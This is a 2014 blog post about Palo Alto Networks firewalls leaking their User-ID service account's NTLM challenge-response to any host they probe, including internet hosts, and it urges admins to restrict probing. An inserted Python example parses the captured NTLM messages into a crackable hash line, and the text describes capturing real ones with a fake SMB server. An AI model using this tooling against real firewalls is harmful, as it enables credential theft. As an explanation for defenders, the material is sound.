Wednesday, October 22, 2014

A significant number of Palo Alto Networks (PAN) firewalls are leaking credential material onto the open internet. It's vital to qualify that statement immediately. The leaks result from firewall administrators enabling Client Probing and Host Probing within the User-ID settings without explicitly limiting those probes to a trusted "zone" or subnet. When probing is unrestricted, the firewall itself initiates an SMB connection to any host it wants to identify, including hosts on the internet, and authenticates with its User-ID service account. Whoever controls the probed host, and answers the connection with a properly formatted SMB server, receives that account's username, domain name and password hash (the NTLM challenge-response sent during SMB authentication, which can be cracked offline).
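To make concrete what a probed host actually receives, here is an added example (not code from the original post or from Palo Alto Networks) that plays both sides of the NTLM exchange inside the SMB session: the rogue host issues a CHALLENGE_MESSAGE and decodes the AUTHENTICATE_MESSAGE the probing firewall sends back. The domain, the service account name svc_userid, the workstation name, the server challenge and the NTProofStr are constructed sample values; a real capture would carry an HMAC-MD5 proof computed from the account's NT hash, which is exactly what makes the line cracking-ready.

```python
import struct

# NTLM negotiate flags (MS-NLMP section 2.2.2.5) used by the sample messages
NTLMSSP_NEGOTIATE_UNICODE     = 0x00000001
NTLMSSP_REQUEST_TARGET        = 0x00000004
NTLMSSP_NEGOTIATE_NTLM        = 0x00000200
NTLMSSP_NEGOTIATE_TARGET_INFO = 0x00800000

SIGNATURE = b"NTLMSSP\x00"


def _buf(msg, off):
    """Resolve an NTLM security-buffer descriptor (Len, MaxLen, Offset) to the bytes it points at."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, off)
    return msg[offset:offset + length]


def build_challenge(server_challenge, target_name):
    """CHALLENGE_MESSAGE (Type 2): what the host being probed sends to the firewall. Constructed, not captured."""
    name = target_name.encode("utf-16-le")
    # AV_PAIR list: MsvAvNbDomainName (id 1) followed by MsvAvEOL (id 0)
    target_info = struct.pack("<HH", 1, len(name)) + name + struct.pack("<HH", 0, 0)
    flags = (NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_REQUEST_TARGET
             | NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_NEGOTIATE_TARGET_INFO)
    header_len = 56                      # fixed part of a Type 2 message
    hdr = SIGNATURE + struct.pack("<I", 2)
    hdr += struct.pack("<HHI", len(name), len(name), header_len)
    hdr += struct.pack("<I", flags) + server_challenge + bytes(8)   # challenge + reserved
    hdr += struct.pack("<HHI", len(target_info), len(target_info), header_len + len(name))
    hdr += bytes(8)                      # Version field, zeroed
    return hdr + name + target_info


def build_authenticate(domain, user, workstation, nt_response, lm_response=bytes(24)):
    """AUTHENTICATE_MESSAGE (Type 3): what the firewall sends back for its User-ID service account. Constructed."""
    strings = [s.encode("utf-16-le") for s in (domain, user, workstation)]
    header_len = 88                      # fixed part of a Type 3 message, incl. Version and MIC
    hdr = SIGNATURE + struct.pack("<I", 3)
    payload = b""
    for item in [lm_response, nt_response] + strings + [b""]:   # last one: session key (absent)
        hdr += struct.pack("<HHI", len(item), len(item), header_len + len(payload))
        payload += item
    hdr += struct.pack("<I", NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_NEGOTIATE_NTLM)
    hdr += bytes(8) + bytes(16)          # Version and MIC, zeroed
    return hdr + payload


def build_ntlmv2_blob(timestamp, client_challenge, target_info):
    """The NTLMv2_CLIENT_CHALLENGE structure that follows the 16-byte NTProofStr in an NTLMv2 response."""
    return (bytes([1, 1]) + bytes(6) + struct.pack("<Q", timestamp)
            + client_challenge + bytes(4) + target_info + bytes(4))


def parse_challenge(msg):
    """Pull the server challenge and AV pairs out of a Type 2 message."""
    if msg[:8] != SIGNATURE or struct.unpack_from("<I", msg, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    return {"server_challenge": msg[24:32], "target_info": _buf(msg, 40)}


def parse_authenticate(msg):
    """Decode a Type 3 message into the fields a rogue SMB server learns about the probing account."""
    if msg[:8] != SIGNATURE or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLM AUTHENTICATE_MESSAGE")
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "latin-1"   # OEM strings approximated as latin-1
    nt = _buf(msg, 20)
    return {
        "domain": _buf(msg, 28).decode(enc),
        "user": _buf(msg, 36).decode(enc),
        "workstation": _buf(msg, 44).decode(enc),
        "lm_response": _buf(msg, 12),
        "nt_proof": nt[:16],             # HMAC-MD5 over server challenge + blob, keyed by the NTLMv2 hash
        "nt_blob": nt[16:],
        "ntlmv2": len(nt) > 24,          # an NTLMv1 response is exactly 24 bytes
    }


def netntlmv2_line(server_challenge, auth):
    """Render the exchange as user::domain:challenge:proof:blob, the usual input format for offline cracking."""
    return "{}::{}:{}:{}:{}".format(auth["user"], auth["domain"], server_challenge.hex(),
                                    auth["nt_proof"].hex(), auth["nt_blob"].hex())


def simulate_probe_capture():
    """Both sides of the exchange: the probed host challenges, the firewall answers with its service account."""
    server_challenge = bytes.fromhex("0123456789abcdef")            # constructed
    type2 = build_challenge(server_challenge, "CORP")
    chal = parse_challenge(type2)
    blob = build_ntlmv2_blob(0, bytes.fromhex("fedcba9876543210"), chal["target_info"])
    proof = bytes.fromhex("00112233445566778899aabbccddeeff")       # constructed stand-in for the real HMAC-MD5
    type3 = build_authenticate("CORP", "svc_userid", "PA-FW01", proof + blob)   # hypothetical account/host names
    return netntlmv2_line(chal["server_challenge"], parse_authenticate(type3))


if __name__ == "__main__":
    print(simulate_probe_capture())
```

Run it and the output is a single line naming the account, the domain and the challenge-response; point a fake SMB server at the internet-facing side of a firewall with unrestricted probing and the same parser applied to the real Type 3 message yields the same kind of line, ready for an offline dictionary attack. Note that the probe reveals the service account name and domain even if the password never cracks, which is reconnaissance an attacker would otherwise have to work for.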

Enabling such a configuration on a production firewall appliance, with the resulting leaks, produces a somewhat unusual situation in which responsibility for the vulnerability ought to be shared between security administrators and PAN developers. SMB probing should be restricted to trusted subnets; this is obvious. That said, such a setting should not be essentially encouraged by the user interface. It would be trivial to produce an error or warning message when saving a configuration that allows SMB probing toward the WAN. Clearly there was an oversight on the part of PAN here.

To their credit, PAN has released an advisory to their customers, and has done so promptly. Even more to their credit, they cited HD Moore's original post in their own. Honesty and transparency of this nature is rare and should be applauded. It's tough to own up when you screw up, but PAN appears to have done just that.

It's a simple problem with a simple solution, admins. Disable probing on your PAN appliance, or ensure that SMB probes are restricted to a trusted subnet. An explicit how-to on that task is available here.

About Me

Joshua Wieder has been a systems administrator for close to 10 years, specializing in data center and hosting infrastructure using Red Hat Linux, Cisco IOS, VMware, KVM and containers such as Docker and Kubernetes. Get in touch with Josh Wieder here on Google+ or using one of the websites on the links page.